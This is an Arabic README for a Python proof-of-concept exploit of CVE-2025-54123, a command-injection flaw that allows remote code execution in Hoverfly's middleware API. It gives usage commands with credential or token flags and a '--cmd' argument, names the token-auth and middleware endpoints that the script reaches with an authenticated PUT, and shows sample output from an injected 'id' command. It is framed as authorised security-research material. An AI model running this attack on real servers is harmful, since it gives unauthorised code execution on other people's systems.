
إثبات المفهوم بلغة Python لـ CVE-2025-54123، يوضح ثغرة حقن الأوامر المؤدية إلى تنفيذ التعليمات البرمجية عن بعد (RCE) في واجهة برمجة تطبيقات الوسيطة (middleware API) الخاصة بـ Hoverfly مع المصادقة باستخدام بيانات الاعتماد أو الرمز المميز.
يحتوي هذا المستودع على نص برمجي لإثبات المفهوم (PoC) بلغة Python للتفاعل مع مثيلات Hoverfly المتأثرة بـ CVE-2025-54123.
يدعم النص البرمجي:
تحذير
هذا المشروع مخصص فقط لأغراض البحث الأمني المصرح به والاختبار والتعليم. لا تستخدمه ضد الأنظمة دون إذن صريح.
تثبيت التبعيات:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| الوسيطة | الوصف |
|---|---|
--target | اسم المجال أو عنوان IP الهدف |
--port | منفذ الخدمة الهدف |
-u | اسم مستخدم Hoverfly |
-p | كلمة مرور Hoverfly |
--token | رمز حامل موجود |
--cmd | سلسلة الأمر المرسلة إلى نقطة نهاية الوسيطة |
عند تقديم بيانات الاعتماد:
/api/token-auth
يتصل النص البرمجي بـ:
/api/v2/hoverfly/middleware
باستخدام طلب PUT مُوثَق.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
هذا المستودع مقدم للأغراض التعليمية والأمنية الدفاعية والاختبار المصرح به فقط. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الضرر أو العواقب القانونية الناتجة عن استخدام هذا البرنامج.